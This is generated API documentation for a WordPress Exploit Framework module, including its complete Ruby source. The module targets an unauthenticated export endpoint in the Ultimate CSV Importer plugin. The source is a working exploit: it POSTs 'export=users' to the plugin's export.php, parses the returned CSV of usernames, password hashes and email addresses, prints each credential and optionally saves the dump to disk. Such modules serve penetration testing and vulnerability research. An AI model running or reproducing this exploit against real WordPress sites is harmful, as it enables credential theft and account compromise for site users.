Class: Wpxf::Auxiliary::UltimateCsvImporterUserExtract

Inherits:
Module
  • Object
Includes:
Wpxf, Net::HttpClient
Defined in:
lib/wpxf/modules/auxiliary/hash_dump/ultimate_csv_importer_user_extract.rb

Constant Summary

Constants included from Net::HttpOptions

Net::HttpOptions::HTTP_OPTION_BASIC_AUTH_CREDS, Net::HttpOptions::HTTP_OPTION_CLIENT_TIMEOUT, Net::HttpOptions::HTTP_OPTION_FOLLOW_REDIRECT, Net::HttpOptions::HTTP_OPTION_HOST, Net::HttpOptions::HTTP_OPTION_HOST_VERIFICATION, Net::HttpOptions::HTTP_OPTION_MAX_CONCURRENCY, Net::HttpOptions::HTTP_OPTION_PEER_VERIFICATION, Net::HttpOptions::HTTP_OPTION_PORT, Net::HttpOptions::HTTP_OPTION_PROXY, Net::HttpOptions::HTTP_OPTION_PROXY_AUTH_CREDS, Net::HttpOptions::HTTP_OPTION_SSL, Net::HttpOptions::HTTP_OPTION_TARGET_URI, Net::HttpOptions::HTTP_OPTION_USER_AGENT, Net::HttpOptions::HTTP_OPTION_VHOST

Constants included from WordPress::Options

WordPress::Options::WP_OPTION_CONTENT_DIR

Instance Attribute Summary

Attributes inherited from Module

#active_workspace, #event_emitter, #payload, #session_cookie

Attributes included from Options

#datastore, #options

Instance Method Summary

Methods included from Net::HttpClient

#base_http_headers, #base_uri, #download_file, #execute_delete_request, #execute_get_request, #execute_post_request, #execute_put_request, #execute_queued_requests, #execute_request, #full_uri, #initialize_advanced_options, #initialize_options, #max_http_concurrency, #normalize_relative_uri, #normalize_uri, #queue_request, #target_host, #target_port, #target_uri

Methods included from Net::TyphoeusHelper

#advanced_typhoeus_options, #create_typhoeus_request, #create_typhoeus_request_options, #standard_typhoeus_options

Methods included from Net::UserAgent

#clients_by_frequency, #random_browser_and_os, #random_chrome_platform_string, #random_firefox_platform_string, #random_firefox_version_string, #random_iexplorer_platform_string, #random_opera_platform_string, #random_processor_string, #random_safari_platform_string, #random_time_string, #random_user_agent

Methods included from Versioning::OSVersions

#random_nt_version, #random_osx_version

Methods included from Versioning::BrowserVersions

#random_chrome_build_number, #random_chrome_version, #random_ie_version, #random_opera_version, #random_presto_version, #random_presto_version2, #random_safari_build_number, #random_safari_version, #random_trident_version

Methods included from Wpxf

app_path, build_module_list, change_stdout_sync, custom_modules_path, data_directory, databases_path, gemspec, home_directory, load_custom_modules, load_module, modules_path, payloads_path, version

Methods inherited from Module

#aux_module?, #can_execute?, #check_wordpress_and_online, #cleanup, #exploit_module?, #missing_options, #set_option_value, #unset_option

Methods included from Db::Credentials

#store_credentials

Methods included from ModuleAuthentication

#authenticate_with_wordpress, #requires_authentication

Methods included from WordPress::Urls

#wordpress_url_admin, #wordpress_url_admin_ajax, #wordpress_url_admin_options, #wordpress_url_admin_post, #wordpress_url_admin_profile, #wordpress_url_admin_update, #wordpress_url_atom, #wordpress_url_author, #wordpress_url_comments_post, #wordpress_url_login, #wordpress_url_new_user, #wordpress_url_opml, #wordpress_url_plugin_install, #wordpress_url_plugin_upload, #wordpress_url_plugins, #wordpress_url_post, #wordpress_url_rdf, #wordpress_url_readme, #wordpress_url_rest_api, #wordpress_url_rss, #wordpress_url_sitemap, #wordpress_url_themes, #wordpress_url_uploads, #wordpress_url_wp_content, #wordpress_url_xmlrpc

Methods included from WordPress::Options

#wp_content_dir

Methods included from WordPress::Login

#valid_wordpress_cookie?, #wordpress_login, #wordpress_login_post_body

Methods included from WordPress::Fingerprint

#check_plugin_version_from_changelog, #check_plugin_version_from_readme, #check_theme_version_from_readme, #check_theme_version_from_style, #check_version_from_custom_file, #wordpress_and_online?, #wordpress_version

Methods included from Options

#all_options_valid?, #get_option, #get_option_value, #missing_options, #normalized_option_value, #option_valid?, #option_value?, #register_advanced_options, #register_evasion_options, #register_option, #register_options, #scoped_option_change, #set_option_value, #unregister_option, #unset_option

Methods included from OutputEmitters

#emit_error, #emit_info, #emit_success, #emit_table, #emit_warning

Methods included from ModuleInfo

#emit_usage_info, #module_author, #module_date, #module_desc, #module_description_preformatted, #module_name, #module_references, #update_info

Constructor Details

#initialize ⇒ UltimateCsvImporterUserExtract

Returns a new instance of UltimateCsvImporterUserExtract.



# File 'lib/wpxf/modules/auxiliary/hash_dump/ultimate_csv_importer_user_extract.rb', line 9

# Sets up the module: calls the parent initialiser, records the module
# metadata and registers the one option this module adds.
#
# The metadata describes a missing permission check on the plugin's
# 'export.php' script that discloses the WordPress user table (usernames,
# password hashes and e-mail addresses); the reference is WPVDB 7778.
#
# @return [UltimateCsvImporterUserExtract] a new instance
def initialize
  super

  # The whitespace inside this literal is part of the runtime string.
  summary = %(
      Due to lack of verification of a visitor's permissions, it is
      possible to execute the 'export.php' script included in the
      default installation of the Ultimate CSV Importer plugin and
      retrieve the full contents of the user table in the WordPress
      installation. This results in full disclosure of usernames,
      hashed passwords and email addresses for all users.
    )

  credits = [
    'James Hooker', # Disclosure
    'rastating'     # WPXF module
  ]

  update_info(
    name: 'Ultimate CSV Importer User Table Extract',
    desc: summary,
    author: credits,
    references: [%w[WPVDB 7778]],
    date: 'Feb 02 2015'
  )

  # Optional: when unset, #export_path returns nil and nothing is written
  # to disk.
  export_option = StringOption.new(
    name: 'export_path',
    desc: 'The file to save the export to',
    required: false
  )
  register_options([export_option])
end

Instance Method Details

#check ⇒ Object



# File 'lib/wpxf/modules/auxiliary/hash_dump/ultimate_csv_importer_user_extract.rb', line 41

# Fingerprints the installed plugin through its readme file.
#
# NOTE(review): the two version strings are presumably the first fixed
# release ('3.6.7') and the first affected release ('3.6.0'); confirm the
# argument order against #check_plugin_version_from_readme.
#
# @return [Object] whatever #check_plugin_version_from_readme returns
def check
  plugin_slug = 'wp-ultimate-csv-importer'
  check_plugin_version_from_readme(plugin_slug, '3.6.7', '3.6.0')
end

#export_path ⇒ Object



# File 'lib/wpxf/modules/auxiliary/hash_dump/ultimate_csv_importer_user_extract.rb', line 45

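# Resolves the operator-supplied 'export_path' option to an absolute path.
#
# The option is read once, so the nil check and the expansion always see
# the same value. File.expand_path resolves relative paths against the
# current working directory and expands a leading '~'.
#
# @return [String, nil] absolute path, or nil when the option is unset
def export_path
  configured = normalized_option_value('export_path')
  return nil if configured.nil?

  File.expand_path(configured)
end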

#exporter_url ⇒ Object



# File 'lib/wpxf/modules/auxiliary/hash_dump/ultimate_csv_importer_user_extract.rb', line 54

# Builds the URL of the plugin's 'export.php' script, the endpoint the
# module description says lacks a permission check.
#
# @return [Object] result of #normalize_uri for the plugin base URL plus
#   'modules/export/templates/export.php'
def exporter_url
  script_segments = %w[modules export templates export.php]
  normalize_uri(plugin_url, *script_segments)
end

#parse_csv(body, delimiter) ⇒ Object



# File 'lib/wpxf/modules/auxiliary/hash_dump/ultimate_csv_importer_user_extract.rb', line 77

# Parses +body+ as CSV with a header row and passes every row to
# #process_row.
#
# Side effect: the :blank_to_nil converter is (re)registered in the
# process-wide CSV::Converters table on every call.
#
# Any StandardError raised while parsing or inside #process_row is
# swallowed and reported as +false+, so a +false+ result does not by
# itself prove that the CSV was malformed. The whole document is read
# before the first row is processed.
#
# @param body [String] raw CSV text
# @param delimiter [String] column separator to parse with
# @return [Boolean] true when all rows were processed, false on any error
def parse_csv(body, delimiter)
  # Turns empty strings into nil; other values pass through unchanged.
  CSV::Converters[:blank_to_nil] = ->(field) { field && field.empty? ? nil : field }

  parser = CSV.new(
    body,
    col_sep: delimiter,
    headers: true,
    header_converters: :symbol,
    # :all also coerces fields that look like numbers or dates.
    converters: %i[all blank_to_nil]
  )
  parser.to_a.each { |row| process_row(row) }
  true
rescue StandardError
  false
end

#payload_body ⇒ Object



# File 'lib/wpxf/modules/auxiliary/hash_dump/ultimate_csv_importer_user_extract.rb', line 58

# Builds the POST body for the export request: a single field,
# 'export' => 'users'.
#
# The value is handed back through a non-local +return+ from inside the
# block, so this method returns whatever BodyBuilder#create yields.
# NOTE(review): any clean-up #create performs after the block would have
# to run from an +ensure+; confirm in Utility::BodyBuilder.
#
# @return [Object] the body yielded by Utility::BodyBuilder#create
def payload_body
  form = Utility::BodyBuilder.new
  form.add_field('export', 'users')
  form.create { |encoded| return encoded }
end

#plugin_url ⇒ Object



# File 'lib/wpxf/modules/auxiliary/hash_dump/ultimate_csv_importer_user_extract.rb', line 50

# Base URL of the plugin, i.e. the 'wp-ultimate-csv-importer' directory
# under the site's plugins URL.
#
# @return [Object] result of #normalize_uri
def plugin_url
  plugins_root = wordpress_url_plugins
  normalize_uri(plugins_root, 'wp-ultimate-csv-importer')
end

#process_row(row) ⇒ Object



# File 'lib/wpxf/modules/auxiliary/hash_dump/ultimate_csv_importer_user_extract.rb', line 66

# Records one parsed row when it carries both a login and a password hash.
#
# Rows missing either field are skipped. A recorded row is announced via
# #emit_success, with the password hash included in the message, and
# appended to @credentials.
# NOTE(review): the +true+ passed to #emit_success is presumably a
# verbose-only flag; confirm, since it decides where the hash is printed.
#
# @param row [#[]] a row indexable by :user_login, :user_pass, :user_email
# @return [Array, nil] @credentials after the push, or nil when skipped
def process_row(row)
  login = row[:user_login]
  secret = row[:user_pass]
  return unless login && secret

  emit_success "Found credential: #{login}:#{secret}", true
  entry = { username: login, password: secret, email: row[:user_email] }
  @credentials.push(entry)
end

#run ⇒ Object



# File 'lib/wpxf/modules/auxiliary/hash_dump/ultimate_csv_importer_user_extract.rb', line 96

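# Requests the user-table export, parses it and reports what was found.
#
# Steps: POST to #exporter_url with #payload_body, require a 200 response,
# parse the body as CSV (comma first, then semicolon), emit the collected
# rows as a table and, when 'export_path' is set, save the raw response.
#
# The saved file contains usernames, password hashes and e-mail addresses,
# so it is created with owner-only permissions.
#
# @return [Boolean] true on success, false when the parent #run declines,
#   the target does not answer with 200, or the response cannot be parsed
def run
  return false unless super

  # The first entry doubles as the header row of the table emitted below.
  @credentials = [{
    username: 'Username', password: 'Password Hash', email: 'E-mail'
  }]

  emit_info 'Requesting CSV extract...'
  res = execute_post_request(url: exporter_url, body: payload_body)

  if res.nil?
    emit_error 'No response from the target'
    return false
  end

  if res.code != 200
    emit_error "Server responded with code #{res.code}"
    return false
  end

  emit_info 'Parsing response...'
  unless parse_csv(res.body, ',') || parse_csv(res.body, ';')
    emit_error 'Failed to parse response, the CSV was invalid'
    emit_info "CSV content: #{res.body}", true
    return false
  end

  emit_table @credentials

  # Resolve the option once so the write and the message use the same path.
  destination = export_path
  if destination
    emit_info 'Saving export...'
    # 0o600 keeps a newly created dump readable by the owner only. The mode
    # is applied at creation time; an existing file keeps its permissions.
    File.open(destination, 'w', 0o600) { |file| file.write(res.body) }
    emit_success "Saved export to #{destination}"
  end

  true
end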